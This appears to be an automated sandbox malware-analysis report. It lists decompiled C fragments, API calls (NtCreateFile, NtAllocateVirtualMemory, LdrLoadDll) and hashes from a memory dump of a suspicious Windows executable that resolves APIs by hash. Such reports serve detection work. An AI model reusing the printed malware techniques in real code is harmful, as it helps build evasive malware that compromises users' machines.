Source File: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: 27A$27A
API String ID: 2738559852-1193276748
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: eaaa8c860b3518be0138bc6cc654d1c6e0dc8bd7e8e2602f57dd643bd48d03cb
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 98F0A4B6210208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00417B4A, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417B4A(signed int __eax, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28, void* _a32, void* _a36, void* _a40, void* _a44, void* _a48, void* _a52) {
				signed int _t21;

				_t21 = __eax | 0xcbb9ef41;
				if (_t21 == 0) goto L3;
			}

0x00417b4a
0x00417b4f

APIs

NtCreateFile.NTDLL(00000060,004088C3,?,w5A,004088C3,FFFFFFFF,?,?,FFFFFFFF,004088C3,00413577,?,004088C3,00000060,00000000,00000000), ref: 00417BDD

Strings

w5A, xrefs: 00417BC9, 00417BD4

Memory Dump Source

Source File: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID: w5A
API String ID: 823142352-219485303
Opcode ID: de1540f12d081298c8bd792808115013203990353c3efc87c22235b9d63e3d00
Instruction ID: 43b05067add29705289f6d2dbda78d466efebead77dbd7cc696805c63c10646f
Opcode Fuzzy Hash: de1540f12d081298c8bd792808115013203990353c3efc87c22235b9d63e3d00
Instruction Fuzzy Hash: ED11E5B2614108AFCB08DF88DC85DEB73AEAF8C354F148549BA1D97241D634E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00417B8A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,004088C3,?,w5A,004088C3,FFFFFFFF,?,?,FFFFFFFF,004088C3,00413577,?,004088C3,00000060,00000000,00000000), ref: 00417BDD

Strings

w5A, xrefs: 00417BC9, 00417BD4

Memory Dump Source

Source File: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID: w5A
API String ID: 823142352-219485303
Opcode ID: 30c40fd8cc863cd3dc429d410a7236dd6f2a73a828becbccb7f1a20e5ae15dda
Instruction ID: a4252c588947c588f36fd1985dd50426b6597badc39c6f53cd86e35a17b93ac5
Opcode Fuzzy Hash: 30c40fd8cc863cd3dc429d410a7236dd6f2a73a828becbccb7f1a20e5ae15dda
Instruction Fuzzy Hash: 7C01AFB2210208ABCB48CF88DC95EEB37A9AF8C754F15864CFA1D97241C634EC518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00417B90, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,004088C3,?,w5A,004088C3,FFFFFFFF,?,?,FFFFFFFF,004088C3,00413577,?,004088C3,00000060,00000000,00000000), ref: 00417BDD

Strings

w5A, xrefs: 00417BC9, 00417BD4

Memory Dump Source

Source File: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID: w5A
API String ID: 823142352-219485303
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 10690e9f46c82c77f6a084c1be0f9e719de7a86e742cee37e8461f3013a72cec
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: E4F0B2B2210208ABCB08CF89DC85EEB77EDAF8C754F158248BA1D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00417BE2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,004088C3,?,w5A,004088C3,FFFFFFFF,?,?,FFFFFFFF,004088C3,00413577,?,004088C3,00000060,00000000,00000000), ref: 00417BDD

Strings

w5A, xrefs: 00417BC9, 00417BD4

Memory Dump Source

Source File: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID: w5A
API String ID: 823142352-219485303
Opcode ID: cf58cdbc3749325acd3f8861f5a16b2944a4859418916df0ecfbc377469a174b
Instruction ID: d91d5ccd223bd4cf167a1287bb1ccca2e52a2308b324d046671a871248b4382d
Opcode Fuzzy Hash: cf58cdbc3749325acd3f8861f5a16b2944a4859418916df0ecfbc377469a174b
Instruction Fuzzy Hash: 07D062B2148115AB9B55DE8CDC55DEB77BD9B9C350714850DB659C3140D630A8508764

Uniqueness

Uniqueness Score: -1.00%

Function 004098F0, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004098F0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041A4F0( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041A910(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041AB90( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00418CD0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x0040990c
0x0040990f
0x00409914
0x00409919
0x00409923
0x00409928
0x0040992b
0x0040992d
0x00409935
0x0040993a
0x0040993a
0x00409941
0x00409949
0x0040994c
0x0040994e
0x00409962
0x00000000
0x00409964
0x0040996a
0x0040991e
0x0040991e
0x0040991e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409962

Memory Dump Source

Source File: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 37f4746ef459d9f07f06715d19472fa1fcea844b9e4b44dfac876fc9659aa77f
Instruction ID: a12a3921f5f9089bd32166e88a76ac31faddbf4be4eb72602b1f92fffc45e404
Opcode Fuzzy Hash: 37f4746ef459d9f07f06715d19472fa1fcea844b9e4b44dfac876fc9659aa77f
Instruction Fuzzy Hash: 520125B5D0020DA7DF10DBE5DC46FDEB3789B54318F0041A9E908A7282F675EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 00417D70, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417D70(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418790(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x00417d7f
0x00417d87
0x00417da9
0x00417dad

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418964,?,00000000,?,00003000,00000040,00000000,00000000,004088C3), ref: 00417DA9

Memory Dump Source

Source File: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: da47b9df74340ed8d877510c979bf2a81e564efb0892b0fa81a665519dc21f7f
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: B6F015B6210208ABCB14DF89CC81EEB77ADAF88754F118549BE1897241C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00417CC0, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417CC0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409513
				E00418790(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x00417cc3
0x00417cc6
0x00417ccf
0x00417cd7
0x00417ce5
0x00417ce9

APIs

NtClose.NTDLL(00413710,?,?,00413710,004088C3,FFFFFFFF), ref: 00417CE5

Memory Dump Source

Source File: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 2fadb63c039088e9f8d7c2900635846d14515c2ce75ccd8e96f584c1baab8087
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 0FD01776600214ABD710EB99CC85FE77BADEF48760F154499BA189B282C930FA0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 00417CBF, Relevance: 1.5, APIs: 1, Instructions: 17
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417CBF(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t12;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409513
				E00418790(_t12, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x00417cc3
0x00417cc6
0x00417ccf
0x00417cd7
0x00417ce5
0x00417ce9

APIs

NtClose.NTDLL(00413710,?,?,00413710,004088C3,FFFFFFFF), ref: 00417CE5

Memory Dump Source

Source File: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 091ff720e87ca60ca6ba39cd2ad499ded1e1908e33ca4b5acf7eff8e12ba7aa8
Instruction ID: f3e01885369b4ffbef65f1684c3e7ef4eb91930ddbc9c1db66e64c806ce689b9
Opcode Fuzzy Hash: 091ff720e87ca60ca6ba39cd2ad499ded1e1908e33ca4b5acf7eff8e12ba7aa8
Instruction Fuzzy Hash: E7D0A7AD50D3C04FCB11EBB469D10D77F81EF516287245ECFE4A807643D578D6199391

Uniqueness

Uniqueness Score: -1.00%

Function 00E498F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E498FA

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 15e019a957cdcb8b7e01640e576e2f333405780be89f0089063519128089cb43
Instruction ID: e81d3a015131b73bec1e0a4d32bd4a123361fbd7085c0a68012a07fc78f59ef4
Opcode Fuzzy Hash: 15e019a957cdcb8b7e01640e576e2f333405780be89f0089063519128089cb43
Instruction Fuzzy Hash: 8C90026170500503D21271594805616410ED7D0382F91D432A5015555ECA6589D6F171

Uniqueness

Uniqueness Score: -1.00%

Function 00E49860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E4986A

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 98357c84fc1b2053badb37ac4e6dd692eb52bd17a2b0c380fd45760f6e3714e1
Instruction ID: 92d16b2bf850d7f13a4beb8a6853d47c24eb13a7f24c741e33d225f185b2de37
Opcode Fuzzy Hash: 98357c84fc1b2053badb37ac4e6dd692eb52bd17a2b0c380fd45760f6e3714e1
Instruction Fuzzy Hash: 1790027130500413D22261594905707410DD7D0382F91D822A4415558D96968996F161

Uniqueness

Uniqueness Score: -1.00%

Function 00E49840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E4984A

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a871781299d5ffc71c7182a9efe586b1cd52e9f513c396ee5b02c11e4d29e89b
Instruction ID: 911791ecbeec6da3c27e4a7d17d6222dfc41e178aa1aca649f8b263baf7627b6
Opcode Fuzzy Hash: a871781299d5ffc71c7182a9efe586b1cd52e9f513c396ee5b02c11e4d29e89b
Instruction Fuzzy Hash: 55900261346041535656B1594805507810AE7E0382791D422A5405950C8566989AE661

Uniqueness

Uniqueness Score: -1.00%

Function 00E499A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E499AA

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bfe83f7556279e6b8c384964d8c7a5781a96e0630f1b352e538f08f56f992c3c
Instruction ID: b943d903532b5197648c5e378e32f4185977bebcdccd2e34d370cc0bce760279
Opcode Fuzzy Hash: bfe83f7556279e6b8c384964d8c7a5781a96e0630f1b352e538f08f56f992c3c
Instruction Fuzzy Hash: 799002A134500443D21161594815B064109D7E1342F51D425E5055554D8659CC96B166

Uniqueness

Uniqueness Score: -1.00%

Function 00E49910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E4991A

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 01dfa3762016d960a1bb4aef387d6109c884e55ca8501095db8006242e584541
Instruction ID: a1a6e03ce14d242d7274ca4ee5b719f84a757501f92e0c9d039c1fe4be9b67c7
Opcode Fuzzy Hash: 01dfa3762016d960a1bb4aef387d6109c884e55ca8501095db8006242e584541
Instruction Fuzzy Hash: A29002B130500403D251715948057464109D7D0342F51D421A9055554E86998DD9B6A5

Uniqueness

Uniqueness Score: -1.00%

Function 00E49A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E49A5A

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 61ebbf90e037c9c5b81329ea51cdb081447cf8250c11dbfd2b94788a45d222d7
Instruction ID: ff06ed388f2b17db0fbcc3d5c1cd5c9247dc1133d8cf6280f387a70e24ca7bdc
Opcode Fuzzy Hash: 61ebbf90e037c9c5b81329ea51cdb081447cf8250c11dbfd2b94788a45d222d7
Instruction Fuzzy Hash: 4690026131580043D31165694C15B074109D7D0343F51D525A4145554CC95588A5A561

Uniqueness

Uniqueness Score: -1.00%

Function 00E49A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E49A2A

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9e08728f29bcf88cc6614f79ade7d4b967ce146b137b9e44ea564e5f2736f46d
Instruction ID: dba471790705a8c0966521cab5d8b37cfdd5cb5719f80dcd74f2c8546fd15bb4
Opcode Fuzzy Hash: 9e08728f29bcf88cc6614f79ade7d4b967ce146b137b9e44ea564e5f2736f46d
Instruction Fuzzy Hash: A890026170500043425171698C459068109FBE1352751D531A4989550D859988A9A6A5

Uniqueness

Uniqueness Score: -1.00%

Function 00E49A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E49A0A

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bfe55fdc352573e2f5ea3b1e3db1b56bfa5e2355e377468a16a48894ea53b952
Instruction ID: 6e572bb8fc10fc477a9d902b9794e6e6de6a09a046273c8a9eb13c3f347a24dd
Opcode Fuzzy Hash: bfe55fdc352573e2f5ea3b1e3db1b56bfa5e2355e377468a16a48894ea53b952
Instruction Fuzzy Hash: DF90027130540403D21161594C1570B4109D7D0343F51D421A5155555D86658895B5B1

Uniqueness

Uniqueness Score: -1.00%

Function 00E495D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E495DA

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8e0ce78aa96e74c7b1d589dda1382637847050fde0691b445bb2f53b9ee1cd35
Instruction ID: 26786cc4c8a75767f9a3a839adb7208e0f400950ccc61ccba283ca5f5b8e7896
Opcode Fuzzy Hash: 8e0ce78aa96e74c7b1d589dda1382637847050fde0691b445bb2f53b9ee1cd35
Instruction Fuzzy Hash: EC9002A130600003421671594815616810ED7E0342B51D431E5005590DC56588D5B165

Uniqueness

Uniqueness Score: -1.00%

Function 00E49540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E4954A

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d06edaf2042b7cac00091f805662137743bf4bf3dbe6a86ec87413ee03073adc
Instruction ID: 3d426b4a3ff5fd22cb6459a0bf97fc7806380d550e4877ef6ae232601a8bcd96
Opcode Fuzzy Hash: d06edaf2042b7cac00091f805662137743bf4bf3dbe6a86ec87413ee03073adc
Instruction Fuzzy Hash: A6900265315000030216A5590B05507414AD7D5392351D431F5006550CD66188A5A161

Uniqueness

Uniqueness Score: -1.00%

Function 00E496E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E496EA

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5f3556aa3d133bde637c462e22f5da0be5613055b6739b1ba3d1f20bbea83d38
Instruction ID: 96e847c41b2987c841e8ad5bf531e2d6d806c3e84070e003c12fe4bf3441462d
Opcode Fuzzy Hash: 5f3556aa3d133bde637c462e22f5da0be5613055b6739b1ba3d1f20bbea83d38
Instruction Fuzzy Hash: 8F90027130508803D2216159880574A4109D7D0342F55D821A8415658D86D588D5B161

Uniqueness

Uniqueness Score: -1.00%

Function 00E49660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E4966A

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6c34307443f36d363640916cfe32221d77ea26a3b13663f571d1495b04f236c8
Instruction ID: 965b60f7ba2123ec6108664774f54637b2fbf554a5e921e3ce9eef422fbc88ab
Opcode Fuzzy Hash: 6c34307443f36d363640916cfe32221d77ea26a3b13663f571d1495b04f236c8
Instruction Fuzzy Hash: 3990027130500803D2917159480564A4109D7D1342F91D425A4016654DCA558A9DB7E1

Uniqueness

Uniqueness Score: -1.00%

Function 00E49FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E49FEA

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bb0285feb27e08de06df48380cda67aea25415eae64a3af4e8371e8d2cc2c4bd
Instruction ID: ea77f663c0700cd7fe4d622f7c0482362273bc9fb824b447529b136659ab0f0c
Opcode Fuzzy Hash: bb0285feb27e08de06df48380cda67aea25415eae64a3af4e8371e8d2cc2c4bd
Instruction Fuzzy Hash: 4290027131514403D221615988057064109D7D1342F51D821A4815558D86D588D5B162

Uniqueness

Uniqueness Score: -1.00%

Function 00E497A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E497AA

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e937122585f6d135ff7b75534db7396d79737045237aee140bf2167a66d2e07b
Instruction ID: c7e15204016a88b2937642cb042645a47b75a8cde80bd8783db80bfc86686e28
Opcode Fuzzy Hash: e937122585f6d135ff7b75534db7396d79737045237aee140bf2167a66d2e07b
Instruction Fuzzy Hash: 6D90026130500003D251715958196068109E7E1342F51E421E4405554CD955889AA262

Uniqueness

Uniqueness Score: -1.00%

Function 00E49780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E4978A

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c27ff98695d1245479c2162d74e60e44fefe0fb2849c3ad446eb6390f1a8604d
Instruction ID: 4d7a4c1d01e64d4329ad41de2521c09c6eee195f3b0efa47c905dfd52efb669f
Opcode Fuzzy Hash: c27ff98695d1245479c2162d74e60e44fefe0fb2849c3ad446eb6390f1a8604d
Instruction Fuzzy Hash: A890026931700003D2917159580960A4109D7D1343F91E825A4006558CC95588ADA361

Uniqueness

Uniqueness Score: -1.00%

Function 00E49710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E4971A

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f9469d9251912efba263517b66afbd47b884ebb9081665ee633fcf3eed0a0e0e
Instruction ID: ca250dcb974485e718511cf791c27c8f27a576bff2557e1a578628ac80cd97ce
Opcode Fuzzy Hash: f9469d9251912efba263517b66afbd47b884ebb9081665ee633fcf3eed0a0e0e
Instruction Fuzzy Hash: F790027130500403D211659958096464109D7E0342F51E421A9015555EC6A588D5B171

Uniqueness

Uniqueness Score: -1.00%

Function 00408690, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00408690(intOrPtr _a4) {
				void* _v8;
				char _v24;
				void* _v284;
				void* _v804;
				void* _v840;
				void* _t24;
				void* _t39;
				intOrPtr _t52;
				void* _t53;
				void* _t54;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406A40(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if (_t24 != 0) goto L3;
				_push(es);
			}

0x0040869b
0x004086a3
0x004086a5
0x004086aa
0x004086af
0x004086b0

Memory Dump Source

Source File: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d3662c9d9ed3c3facb10e0fc7046eba54cc15a70dcd97eba515afb8798193ec
Instruction ID: c69876e2df5d0574795b3518acc725ef27746ff2c942095ba8a586c5133c5c0d
Opcode Fuzzy Hash: 9d3662c9d9ed3c3facb10e0fc7046eba54cc15a70dcd97eba515afb8798193ec
Instruction Fuzzy Hash: 58213CB2D4020457CB24DA609D52BEF73BC9F50304F54047FF989A3181F6396B4987B6

Uniqueness

Uniqueness Score: -1.00%

Function 00417E60, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417E60(intOrPtr _a4, void* _a8, long _a12, char _a16) {
				void* _t10;
				void* _t15;

				E00418790(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t4 =  &_a16; // 0x41366f
				_t10 = RtlAllocateHeap(_a8, _a12,  *_t4); // executed
				return _t10;
			}

0x00417e77
0x00417e7c
0x00417e8d
0x00417e91

APIs

RtlAllocateHeap.NTDLL(00412EF6,?,o6A,0041366F,?,00412EF6,?,?,?,?,?,00000000,004088C3,?), ref: 00417E8D

Strings

o6A, xrefs: 00417E7C, 00417E88

Memory Dump Source

Source File: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID: o6A
API String ID: 1279760036-873313660
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: c9417f70005613f19bd9ba71a6b8a8a4d9cd85df102b60952aef21c56d6ae440
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 46E012B5210208ABDB14EF99CC41EA777ADAF88664F118559BA185B282CA30F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00417E93, Relevance: 1.6, APIs: 1, Instructions: 70
memoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00417E93(void* __eax, signed char* __ecx, void* _a4, long _a8, void* _a12) {
				intOrPtr _v0;
				char _t13;
				void* _t20;

				asm("in eax, 0x8");
				asm("loope 0x7f");
				asm("arpl si, si");
				 *__ecx =  ~( *__ecx);
				_push(_t24);
				_t10 = _v0;
				_t4 = _t10 + 0xc74; // 0xc74
				E00418790(_t20, _v0, _t4,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
				_t13 = RtlFreeHeap(_a4, _a8, _a12); // executed
				return _t13;
			}

0x00417e93
0x00417e95
0x00417e97
0x00417e98
0x00417ea0
0x00417ea3
0x00417eaf
0x00417eb7
0x00417ecd
0x00417ed1

APIs

RtlFreeHeap.NTDLL(00000060,004088C3,?,?,004088C3,00000060,00000000,00000000,?,?,004088C3,?,00000000), ref: 00417ECD

Memory Dump Source

Source File: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: da00b989922063055dc5ce64e67de06ac6b5187d5f3154fc46ae5edbb8cdfa0f
Instruction ID: 69121e2bcfc3a4f9d0d87c29c96608ce0c789aa07f3d9df92dd296a0d3f1ce91
Opcode Fuzzy Hash: da00b989922063055dc5ce64e67de06ac6b5187d5f3154fc46ae5edbb8cdfa0f
Instruction Fuzzy Hash: A81156B6200108BBCB04DF99CC80EEB37ADEF8C320F118658FA4997241C630E8418BB4

Uniqueness

Uniqueness Score: -1.00%

Function 00406EA0, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00406EA0(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E004196C0( &_v67, 0, 0x3f);
				E0041A2A0( &_v68, 3);
				_t12 = E004098F0(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413810(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409050(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
